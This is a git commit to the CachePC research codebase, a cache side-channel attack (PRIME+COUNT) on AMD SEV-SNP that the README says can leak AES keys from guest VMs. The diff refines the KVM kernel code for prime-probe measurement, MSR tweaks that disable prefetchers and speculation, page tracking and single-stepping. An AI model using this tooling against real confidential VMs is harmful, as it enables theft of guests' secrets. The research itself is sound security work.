commit 3f43dd1778c7ac8c09c3dc5612ac902c3a7ad84d
parent f2ea010b8180b4160d85c92e312971d0cd8a34d4
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 19 Jan 2023 01:48:16 +0100
Many fixes, more precise single-stepping and more robust self-tests
Diffstat:
9 files changed, 323 insertions(+), 367 deletions(-)
diff --git a/Makefile b/Makefile
@@ -22,6 +22,7 @@ all: build $(BINS)
clean:
$(MAKE) -C $(LINUX) clean M=arch/x86/kvm
$(MAKE) -C $(LINUX) clean M=crypto
+ rm -f cachepc/*.o
rm -f $(BINS)
$(LINUX)/arch/x86/kvm/cachepc:
diff --git a/README b/README
@@ -6,6 +6,10 @@ attack dubbed PRIME+COUNT that we demonstrate can be used to circumvent
AMD's latest secure virtualization solution SEV-SNP to access sensitive
guest information.
+
+tests
+-----
+
Several test-cases were used to verify parts of the exploit chain separately:
test/eviction:
@@ -43,9 +47,14 @@ test/qemu-poc:
Demonstrate that AES encryption keys can be leaked from an
unmodified qemu-based linux guest.
-Testing was done on a bare-metal AMD EPYC 72F3 (Family 0x19, Model 0x01)
-cpu and Supermicro H12SSL-i V1.01 motherboard. The following BIOS settings
-differ from the defaults:
+
+setup
+-----
+
+Testing was done on a Supermicro H12SSL-i V1.01 motherboard and AMD EPYC 72F3
+(Family 0x19, Model 0x01) cpu.
+
+The following BIOS settings differ from the defaults:
Advanced > CPU Configuration > Local APIC Mode = xAPIC
Advanced > CPU Configuration > L1 Stream HW Prefetcher = Disabled
@@ -57,11 +66,17 @@ Advanced > CPU Configuration > SEV ASID Space Limit = 110
Advanced > CPU Configuration > SNP Memory (RMP Table) Coverage = Enabled
Advanced > North Bridge Configuration > SEV-SNP Support = Enabled
Advanced > North Bridge Configuration > Memory Configuration > TSME = Disabled
-Advanced > PCI Devices Common Settings > Memory Configuration > TSME = Disabled
+
+The following kernel parameters were used:
+
+kvm_amd.sev=1 kvm_amd.sev_es=1 nokaslr debug systemd.log_level=info
+ isolcpus=2,10,3,11 nohz_full=2,10,3,11 rcu_nocbs=2,10,3,11 nmi_watchdog=0
+ transparent_hugepage=never apic lapic panic=-1
To successfully build and load the kvm.ko and kvm-amd.ko modules, ensure
that a host kernel debian package was built using `make host`.
-Note: because of bad decisions made in regards to version control,
-the checked out commit of the modified kernel (previously the
-kernel patch file) might be incorrect for older revisions.
+Because of bad decisions made in regards to version control, the checked
+out commit of the modified kernel (previously the kernel patch file) might
+be incorrect for older revisions.
+
diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c
@@ -1,6 +1,8 @@
#include "cachepc.h"
#include "uapi.h"
+#include "../../include/asm/processor.h"
+
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/slab.h>
@@ -28,29 +30,28 @@ static bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len);
bool
cachepc_verify_topology(void)
{
+ uint32_t assoc, linesize;
+ uint32_t size, sets;
uint32_t val;
- uint32_t assoc;
- uint32_t linesize;
- uint32_t size;
- uint32_t sets;
if (PAGE_SIZE != L1_SETS * L1_LINESIZE)
CPC_ERR("System pagesize does not guarentee "
"virtual memory access will hit corresponding "
- "physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE\n");
+ "physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE");
+
/* REF: https://developer.amd.com/resources/developer-guides-manuals
* (PPR 17H 31H, P.81) */
- asm volatile ("cpuid" : "=c"(val) : "a"(0x80000005));
+ val = native_cpuid_ecx(0x80000005);
size = ((val >> 24) & 0xFF) * 1024;
assoc = (val >> 16) & 0xFF;
linesize = val & 0xFF;
sets = size / (linesize * assoc);
if (size != L1_SIZE || assoc != L1_ASSOC
|| linesize != L1_LINESIZE || sets != L1_SETS) {
- CPC_ERR("L1 topology is invalid!\n");
- CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
+ CPC_ERR("L1 topology is invalid!\n");
+ CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
L1_SIZE, size);
CPC_ERR("L1_ASSOC (expected) %u vs. (real) %u\n",
L1_ASSOC, assoc);
@@ -61,7 +62,7 @@ cachepc_verify_topology(void)
return true;
}
- asm volatile ("cpuid" : "=c"(val) : "a"(0x80000006));
+ val = native_cpuid_ecx(0x80000006);
size = ((val >> 16) & 0xFFFF) * 1024;
assoc = (val >> 12) & 0xF;
linesize = val & 0xFF;
@@ -117,18 +118,31 @@ cachepc_verify_topology(void)
}
void
+cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits)
+{
+ uint64_t val, newval;
+ uint32_t lo, hi;
+
+ asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
+ val = (uint64_t) lo | ((uint64_t) hi << 32);
+ val &= ~clear_bits;
+ val |= set_bits;
+ asm volatile ("wrmsr" : : "c"(addr), "a"(val), "d"(0x00));
+
+ asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
+ newval = (uint64_t) lo | ((uint64_t) hi << 32);
+ if (val != newval)
+ CPC_ERR("Write MSR failed at addr %08llX\n", addr);
+}
+
+void
cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
uint8_t host_guest, uint8_t kernel_user)
{
- uint64_t event;
uint64_t reg_addr;
+ uint64_t event;
- /* REF: https://developer.amd.com/resources/developer-guides-manuals
- * (PPR 19H 01H, P.166)
- *
- * performance event selection via 0xC001_020X with X = (0..A)[::2]
- * performance event reading viea 0XC001_020X with X = (1..B)[::2]
- */
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.166 */
WARN_ON(index >= 6);
if (index >= 6) return;
@@ -138,7 +152,8 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
event |= (1ULL << 22); /* enable performance counter */
event |= ((kernel_user & 0b11) * 1ULL) << 16;
event |= ((host_guest & 0b11) * 1ULL) << 40;
- printk(KERN_WARNING "CachePC: Initialized %i. PMC %02X:%02X (%016llx)\n",
+
+ printk(KERN_WARNING "CachePC: Initializing %i. PMC %02X:%02X (%016llx)\n",
index, event_no, event_mask, event);
asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
}
@@ -154,7 +169,8 @@ cachepc_reset_pmc(uint8_t index)
reg_addr = 0xc0010201 + index * 2;
value = 0;
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value));
+
+ asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value), "d"(0x00));
}
cache_ctx *
@@ -247,6 +263,7 @@ cachepc_save_msrmts(cacheline *head)
cachepc_msrmts[curr_cl->cache_set] = curr_cl->count;
}
+ curr_cl->count = 0;
curr_cl = curr_cl->prev;
} while (curr_cl != head);
@@ -289,8 +306,8 @@ cachepc_update_baseline(void)
void __attribute__((optimize(1))) // prevent instruction reordering
cachepc_prime_vcall(uintptr_t ret, cacheline *cl)
{
- if (cachepc_single_step)
- cachepc_apic_oneshot(cachepc_apic_timer);
+ if (cachepc_singlestep)
+ cachepc_apic_oneshot(cachepc_apic_timer / CPC_APIC_TIMER_SOFTDIV);
cachepc_prime(cl);
asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax");
}
diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h
@@ -42,6 +42,8 @@
#define CPC_WARN(...) do { pr_warn("CachePC: " __VA_ARGS__); } while (0)
#define CPC_ERR(...) do { pr_err("CachePC: " __VA_ARGS__); } while (0)
+#define CPC_APIC_TIMER_SOFTDIV 3
+
typedef struct cacheline cacheline;
typedef struct cache_ctx cache_ctx;
@@ -83,6 +85,7 @@ static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8);
bool cachepc_verify_topology(void);
+void cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits);
void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
uint8_t host_guest, uint8_t kernel_user);
void cachepc_reset_pmc(uint8_t index);
@@ -129,10 +132,11 @@ extern bool cachepc_baseline_active;
extern bool cachepc_pause_vm;
-extern bool cachepc_single_step;
-extern uint32_t cachepc_track_mode;
+extern bool cachepc_singlestep;
+extern bool cachepc_singlestep_reset;
extern uint32_t cachepc_apic_timer;
+extern uint32_t cachepc_track_mode;
extern uint64_t cachepc_track_start_gfn;
extern uint64_t cachepc_track_end_gfn;
@@ -166,7 +170,7 @@ cachepc_prime(cacheline *head)
cachepc_mfence();
cachepc_cpuid();
-
+
curr_cl = head;
do {
prev_cl = curr_cl;
diff --git a/cachepc/event.c b/cachepc/event.c
@@ -181,6 +181,8 @@ cachepc_handle_ack_event_ioctl(uint64_t eventid)
write_lock(&cachepc_event_lock);
if (!eventid || eventid == cachepc_last_event_sent) {
+ if (cachepc_event.type == CPC_EVENT_PAUSE)
+ cachepc_pause_vm = false;
err = 0;
cachepc_last_event_acked = cachepc_last_event_sent;
} else {
diff --git a/cachepc/kvm.c b/cachepc/kvm.c
@@ -16,6 +16,8 @@
#include <linux/types.h>
#include <asm/uaccess.h>
+#define TEST_REPEAT_MAX 200
+
bool cachepc_debug = false;
EXPORT_SYMBOL(cachepc_debug);
@@ -44,15 +46,17 @@ EXPORT_SYMBOL(cachepc_rip);
EXPORT_SYMBOL(cachepc_rip_prev);
EXPORT_SYMBOL(cachepc_rip_prev_set);
-bool cachepc_single_step = false;
-uint32_t cachepc_track_mode = false;
+bool cachepc_singlestep = false;
+bool cachepc_singlestep_reset = false;
uint32_t cachepc_apic_timer = 0;
-EXPORT_SYMBOL(cachepc_single_step);
-EXPORT_SYMBOL(cachepc_track_mode);
+EXPORT_SYMBOL(cachepc_singlestep);
+EXPORT_SYMBOL(cachepc_singlestep_reset);
EXPORT_SYMBOL(cachepc_apic_timer);
+uint32_t cachepc_track_mode = false;
uint64_t cachepc_track_start_gfn = 0;
uint64_t cachepc_track_end_gfn = 0;
+EXPORT_SYMBOL(cachepc_track_mode);
EXPORT_SYMBOL(cachepc_track_start_gfn);
EXPORT_SYMBOL(cachepc_track_end_gfn);
@@ -91,9 +95,9 @@ EXPORT_SYMBOL(cachepc_event_avail);
bool cachepc_events_init;
EXPORT_SYMBOL(cachepc_events_init);
-static void cachepc_kvm_prime_probe_test(void *p);
-static void cachepc_kvm_stream_hwpf_test(void *p);
-static void cachepc_kvm_single_eviction_test(void *p);
+static noinline void cachepc_kvm_prime_probe_test(void);
+static noinline void cachepc_kvm_stream_hwpf_test(void);
+static noinline void cachepc_kvm_single_eviction_test(void *p);
static void cachepc_kvm_system_setup(void);
@@ -109,104 +113,96 @@ static int cachepc_kvm_calc_baseline_ioctl(void __user *arg_user);
static int cachepc_kvm_read_baseline_ioctl(void __user *arg_user);
static int cachepc_kvm_apply_baseline_ioctl(void __user *arg_user);
-//static int cachepc_kvm_single_step_ioctl(void __user *arg_user);
-
static int cachepc_kvm_vmsa_read_ioctl(void __user *arg_user);
static int cachepc_kvm_svme_read_ioctl(void __user *arg_user);
+static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user);
static int cachepc_kvm_track_mode_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_page_ioctl(void __user *arg_user);
-// static int cachepc_kvm_track_all_ioctl(void __user *arg_user);
-// static int cachepc_kvm_untrack_all_ioctl(void __user *arg_user);
-static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_range_start_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_range_end_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_exec_cur_ioctl(void __user *arg_user);
-static int cachepc_kvm_vm_pause_ioctl(void __user *arg_user);
-static int cachepc_kvm_vm_resume_ioctl(void __user *arg_user);
-
static int cachepc_kvm_poll_event_ioctl(void __user *arg_user);
static int cachepc_kvm_ack_event_ioctl(void __user *arg_user);
+static int cachepc_kvm_req_pause_ioctl(void __user *arg_user);
+
void
-cachepc_kvm_prime_probe_test(void *p)
+cachepc_kvm_prime_probe_test(void)
{
cacheline *lines;
cacheline *cl, *head;
uint32_t count;
- uint32_t *arg;
- int i, max;
-
- arg = p;
+ int n;
/* l2 data cache hit & miss */
cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
- max = cachepc_ctx->nr_of_cachelines;
-
- cachepc_cpuid();
- cachepc_mfence();
+ // wbinvd();
- for (i = 0; i < max; i++)
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + i) : "rbx");
+ for (n = 0; n < TEST_REPEAT_MAX; n++) {
+ head = cachepc_prime(cachepc_ds);
+ cachepc_probe(head);
- head = cachepc_prime(cachepc_ds);
- cachepc_probe(head);
+ count = 0;
+ cl = head = cachepc_ds;
+ do {
+ if (CL_IS_FIRST(cl->flags))
+ count += cl->count;
+ cl = cl->next;
+ } while (cl != head);
- count = 0;
- cl = head = cachepc_ds;
- do {
- count += cl->count;
- cl = cl->next;
- } while (cl != head);
-
- CPC_WARN("Prime-probe test done (%u vs. %u => %s)\n",
- count, 0, (count == 0) ? "passed" : "failed");
+ if (count != 0) {
+ CPC_ERR("Prime-probe %i. test failed (%u vs. %u)\n",
+ n, count, 0);
+ break;
+ }
+ }
- if (arg) *arg = (count == 0);
+ if (n == TEST_REPEAT_MAX)
+ CPC_WARN("Prime-probe test ok (%u vs. %u)\n", count, 0);
kfree(lines);
}
void
-cachepc_kvm_stream_hwpf_test(void *p)
+cachepc_kvm_stream_hwpf_test(void)
{
cacheline *lines;
+ const uint32_t max = 4;
uint32_t count;
- uint32_t *arg;
- uint32_t max;
-
- arg = p;
+ int n;
/* l2 data cache hit & miss */
cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
- max = 10;
+ // wbinvd();
+
count = 0;
- cachepc_prime(cachepc_ds);
-
- count -= cachepc_read_pmc(CPC_L1MISS_PMC);
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 4) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 5) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 6) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 7) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 8) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 9) : "rbx");
- count += cachepc_read_pmc(CPC_L1MISS_PMC);
-
- CPC_WARN("HWPF test done (%u vs. %u => %s)\n",
- count, max, count == max ? "passed" : "failed");
-
- if (arg) *arg = (count == max);
+ for (n = 0; n < TEST_REPEAT_MAX; n++) {
+ cachepc_prime(cachepc_ds);
+
+ count -= cachepc_read_pmc(CPC_L1MISS_PMC);
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx");
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx");
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx");
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx");
+ count += cachepc_read_pmc(CPC_L1MISS_PMC);
+
+ if (count != max) {
+ CPC_ERR("HWPF %i. test failed (%u vs. %u)\n",
+ n, count, max);
+ break;
+ }
+ }
+
+ if (n == TEST_REPEAT_MAX)
+ CPC_INFO("HWPF test ok (%u vs. %u)\n", count, max);
kfree(lines);
}
@@ -218,7 +214,7 @@ cachepc_kvm_single_eviction_test(void *p)
cacheline *ptr;
uint32_t target;
uint32_t *arg;
- int count;
+ int n, count;
arg = p;
@@ -231,27 +227,38 @@ cachepc_kvm_single_eviction_test(void *p)
ptr = cachepc_prepare_victim(cachepc_ctx, target);
- head = cachepc_prime(cachepc_ds);
- cachepc_victim(ptr);
- cachepc_probe(head);
-
- count = 0;
- evicted = NULL;
- cl = head = cachepc_ds;
- do {
- if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
- evicted = cl;
- count += cl->count;
+ // wbinvd();
+
+ for (n = 0; n < TEST_REPEAT_MAX; n++) {
+ head = cachepc_prime(cachepc_ds);
+ cachepc_victim(ptr);
+ cachepc_probe(head);
+
+ count = 0;
+ evicted = NULL;
+ cl = head = cachepc_ds;
+ do {
+ if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
+ evicted = cl;
+ count += cl->count;
+ }
+ cl = cl->next;
+ } while (cl != head);
+
+ if (count != 1 || evicted->cache_set != target) {
+ CPC_ERR("Single eviction %i. test failed (%u vs %u)\n",
+ n, count, 1);
+ if (arg) *arg = count;
+ break;
}
- cl = cl->next;
- } while (cl != head);
- CPC_WARN("Single eviction test done (%u vs %u => %s)\n",
- count, 1, (count == 1 && evicted->cache_set == target)
- ? "passed" : "failed");
- cachepc_save_msrmts(head);
+ cachepc_save_msrmts(head);
+ }
- if (arg) *arg = count;
+ if (n == TEST_REPEAT_MAX) {
+ CPC_INFO("Single eviction test ok (%u vs %u)\n", count, 1);
+ if (arg) *arg = count;
+ }
cachepc_release_victim(cachepc_ctx, ptr);
}
@@ -259,69 +266,41 @@ cachepc_kvm_single_eviction_test(void *p)
void
cachepc_kvm_system_setup(void)
{
- uint64_t reg_addr, val;
- uint32_t lo, hi;
-
/* NOTE: since most of these MSRs are poorly documented and some
* guessing work was involved, it is likely that one or more of
* these operations are not needed */
- /* disable streaming store */
- reg_addr = 0xc0011020;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 13;
- CPC_WARN("Disabling streaming store (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- /* disable speculative data cache tlb reloads */
- reg_addr = 0xc0011022;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 4;
- CPC_WARN("Disabling speculative reloads (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- /* disable data cache hw prefetchers */
- reg_addr = 0xc0011022;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 13;
- CPC_WARN("Disabling DATA HWPF (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
+ // /* disable streaming store */
+ // cachepc_write_msr(0xc0011020, 0, 1ULL << 13);
+
+ // /* disable speculative data cache tlb reloads */
+ // cachepc_write_msr(0xc0011022, 0, 1ULL << 4);
+
+ // /* disable data cache hw prefetchers */
+ // cachepc_write_msr(0xc0011022, 0, 1ULL << 13);
/* disable inst cache hw prefetchers */
- reg_addr = 0xc0011021;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 13;
- CPC_WARN("Disabling INST HWPF (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- /* REF: https://arxiv.org/pdf/2204.03290.pdf
- * Paper "Memory Performance of AMD EPYC Rome and Intel Cascade
- * Lake SP Server Processors"
- * disable L1 & L2 prefetchers */
-
- reg_addr = 0xc0011022;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 16;
- printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- reg_addr = 0xc001102b;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val &= ~1ULL;
- printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
+ cachepc_write_msr(0xc0011021, 0, 1ULL << 13);
+
+ /* REF: https://arxiv.org/pdf/2204.03290.pdf */
+ /* l1 and l2 prefetchers */
+ cachepc_write_msr(0xc0011022, 0, 1ULL << 16);
+ cachepc_write_msr(0xc001102b, 1ULL << 0, 0);
+
+ /* REF: https://community.amd.com/t5/archives-discussions/modifying-msr-to-disable-the-prefetcher/td-p/143443 */
+ cachepc_write_msr(0xc001102b, 0, 1ULL << 18);
+
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168
+ * disable L1 and L2 prefetcher */
+ cachepc_write_msr(0xC0000108, 0, 0b00101111);
+
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111
+ * disable speculation */
+ cachepc_write_msr(0x00000048, 0, 0b10000111);
+
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.175
+ * disable core performance boost */
+ cachepc_write_msr(0xC0010015, 0, 1ULL << 25);
}
int
@@ -351,6 +330,11 @@ cachepc_kvm_reset_ioctl(void __user *arg_user)
cachepc_kvm_reset_tracking_ioctl(NULL);
cachepc_kvm_reset_baseline_ioctl(NULL);
+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
+ cachepc_apic_timer = 0;
+ cachepc_rip_prev_set = false;
+
return 0;
}
@@ -455,74 +439,6 @@ cachepc_kvm_apply_baseline_ioctl(void __user *arg_user)
}
int
-cachepc_kvm_single_step_ioctl(void __user *arg_user)
-{
- cachepc_single_step = true;
-
- return 0;
-}
-
-int
-cachepc_kvm_track_mode_ioctl(void __user *arg_user)
-{
- struct kvm_vcpu *vcpu;
- uint32_t mode;
-
- if (!arg_user) return -EINVAL;
-
- if (copy_from_user(&mode, arg_user, sizeof(mode)))
- return -EFAULT;
-
- cachepc_single_step = false;
- cachepc_track_mode = mode;
-
- BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array));
- vcpu = xa_load(&main_vm->vcpu_array, 0);
-
- cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC);
- cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
- cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
-
- switch (mode) {
- case CPC_TRACK_FULL:
- cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
- mode = CPC_TRACK_FULL;
- break;
- case CPC_TRACK_EXEC:
- cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC);
- mode = CPC_TRACK_EXEC;
- break;
- default:
- mode = CPC_TRACK_NONE;
- break;
- }
-
- return 0;
-}
-
-int
-cachepc_kvm_track_page_ioctl(void __user *arg_user)
-{
- struct cpc_track_config cfg;
- struct kvm_vcpu *vcpu;
-
- if (!main_vm || !arg_user) return -EINVAL;
-
- if (copy_from_user(&cfg, arg_user, sizeof(cfg)))
- return -EFAULT;
-
- if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX)
- return -EINVAL;
-
- BUG_ON(xa_empty(&main_vm->vcpu_array));
- vcpu = xa_load(&main_vm->vcpu_array, 0);
- if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode))
- return -EFAULT;
-
- return 0;
-}
-
-int
cachepc_kvm_vmsa_read_ioctl(void __user *arg_user)
{
struct kvm_vcpu *vcpu;
@@ -563,50 +479,6 @@ cachepc_kvm_svme_read_ioctl(void __user *arg_user)
return 0;
}
-// int
-// cachepc_kvm_track_all_ioctl(void __user *arg_user)
-// {
-// struct kvm_vcpu *vcpu;
-// uint32_t mode;
-//
-// if (!main_vm || !arg_user) return -EINVAL;
-//
-// if (copy_from_user(&mode, arg_user, sizeof(mode)))
-// return -EFAULT;
-//
-// if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX)
-// return -EINVAL;
-//
-// BUG_ON(xa_empty(&main_vm->vcpu_array));
-// vcpu = xa_load(&main_vm->vcpu_array, 0);
-// if (!cachepc_track_all(vcpu, mode))
-// return -EFAULT;
-//
-// return 0;
-// }
-//
-// int
-// cachepc_kvm_untrack_all_ioctl(void __user *arg_user)
-// {
-// struct kvm_vcpu *vcpu;
-// uint32_t mode;
-//
-// if (!main_vm || !arg_user) return -EINVAL;
-//
-// if (copy_from_user(&mode, arg_user, sizeof(mode)))
-// return -EFAULT;
-//
-// if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX)
-// return -EINVAL;
-//
-// BUG_ON(xa_empty(&main_vm->vcpu_array));
-// vcpu = xa_load(&main_vm->vcpu_array, 0);
-// if (!cachepc_untrack_all(vcpu, mode))
-// return -EFAULT;
-//
-// return 0;
-// }
-
int
cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
{
@@ -619,15 +491,16 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
- cachepc_track_mode = CPC_TRACK_NONE;
-
cachepc_inst_fault_gfn = 0;
cachepc_inst_fault_err = 0;
cachepc_track_start_gfn = 0;
cachepc_track_end_gfn = 0;
- cachepc_single_step = false;
+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
+
+ cachepc_track_mode = CPC_TRACK_NONE;
list_for_each_entry_safe(fault, next, &cachepc_faults, list) {
list_del(&fault->list);
@@ -638,31 +511,73 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
}
int
-cachepc_kvm_poll_event_ioctl(void __user *arg_user)
+cachepc_kvm_track_mode_ioctl(void __user *arg_user)
{
- if (!cachepc_events_init)
- return -EINVAL;
+ struct kvm_vcpu *vcpu;
+ uint32_t mode;
- return cachepc_handle_poll_event_ioctl(arg_user);
-}
+ if (!arg_user) return -EINVAL;
-int
-cachepc_kvm_ack_event_ioctl(void __user *arg_user)
-{
- uint64_t eventid;
+ if (copy_from_user(&mode, arg_user, sizeof(mode)))
+ return -EFAULT;
- if (!arg_user) return -EINVAL;
+ BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array));
+ vcpu = xa_load(&main_vm->vcpu_array, 0);
- if (!cachepc_events_init)
- return -EINVAL;
+ cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC);
+ cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+ cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
- if (copy_from_user(&eventid, arg_user, sizeof(eventid)))
- return -EFAULT;
+ cachepc_apic_timer = 0;
+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
- return cachepc_handle_ack_event_ioctl(eventid);
+ switch (mode) {
+ case CPC_TRACK_FULL:
+ cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+ cachepc_singlestep_reset = true;
+ cachepc_track_mode = CPC_TRACK_FULL;
+ break;
+ case CPC_TRACK_EXEC:
+ cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC);
+ cachepc_singlestep_reset = true;
+ cachepc_track_mode = CPC_TRACK_EXEC;
+ break;
+ case CPC_TRACK_FAULT_NO_RUN:
+ cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+ cachepc_track_mode = CPC_TRACK_FAULT_NO_RUN;
+ break;
+ default:
+ cachepc_track_mode = CPC_TRACK_NONE;
+ break;
+ }
+
+ return 0;
}
// int
+// cachepc_kvm_track_page_ioctl(void __user *arg_user)
+// {
+// struct cpc_track_config cfg;
+// struct kvm_vcpu *vcpu;
+//
+// if (!main_vm || !arg_user) return -EINVAL;
+//
+// if (copy_from_user(&cfg, arg_user, sizeof(cfg)))
+// return -EFAULT;
+//
+// if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX)
+// return -EINVAL;
+//
+// BUG_ON(xa_empty(&main_vm->vcpu_array));
+// vcpu = xa_load(&main_vm->vcpu_array, 0);
+// if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode))
+// return -EFAULT;
+//
+// return 0;
+// }
+//
+// int
// cachepc_kvm_track_range_start_ioctl(void __user *arg_user)
// {
// if (!arg_user) return -EINVAL;
@@ -701,41 +616,16 @@ cachepc_kvm_ack_event_ioctl(void __user *arg_user)
// }
int
-cachepc_kvm_vm_pause_ioctl(void __user *arg_user)
+cachepc_kvm_poll_event_ioctl(void __user *arg_user)
{
- uint64_t deadline;
- int err;
-
- if (!arg_user) return -EINVAL;
-
if (!cachepc_events_init)
return -EINVAL;
- cachepc_pause_vm = true;
-
- deadline = ktime_get_ns() + 20000000000ULL; /* 20s in ns */
- while (true) {
- write_lock(&cachepc_event_lock);
- if (cachepc_event_avail) {
- err = copy_to_user(arg_user, &cachepc_event,
- sizeof(struct cpc_event));
- cachepc_event_avail = false;
- write_unlock(&cachepc_event_lock);
- return 0;
- }
- write_unlock(&cachepc_event_lock);
- if (ktime_get_ns() > deadline) {
- CPC_WARN("Timeout waiting for pause event\n");
- cachepc_pause_vm = false;
- return -EFAULT;
- }
- }
-
- return err;
+ return cachepc_handle_poll_event_ioctl(arg_user);
}
int
